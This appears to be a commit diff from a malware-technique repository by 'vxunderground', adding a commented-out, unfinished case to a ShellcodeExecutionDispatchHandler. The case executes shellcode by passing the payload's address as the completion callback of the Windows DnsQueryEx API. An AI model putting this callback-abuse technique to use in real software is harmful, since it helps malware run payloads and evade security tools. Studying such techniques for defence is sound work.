2.0.371
This commit is contained in:
vxunderground
2022-11-08 18:35:25 -06:00
parent ec9581a288
commit a41a461c6e
7 changed files with 76 additions and 12 deletions
@@ -199,6 +199,26 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
break;
}
case E_DNSQUERYEX:
{
//needs to be debugged
/*
DNS_QUERY_REQUEST Request = { 0 };
DNS_QUERY_RESULT Result = { 0 };
Request.Version = DNS_QUERY_REQUEST_VERSION1;
Request.QueryName = NULL;
Request.QueryType = DNS_TYPE_A;
Request.QueryOptions = DNS_QUERY_STANDARD;
Request.InterfaceIndex = 0;
Request.pQueryCompletionCallback = (PDNS_QUERY_COMPLETION_ROUTINE)BinAddress;
DnsQueryEx(&Request, &Result, NULL);
*/
}
default:
goto EXIT_ROUTINE;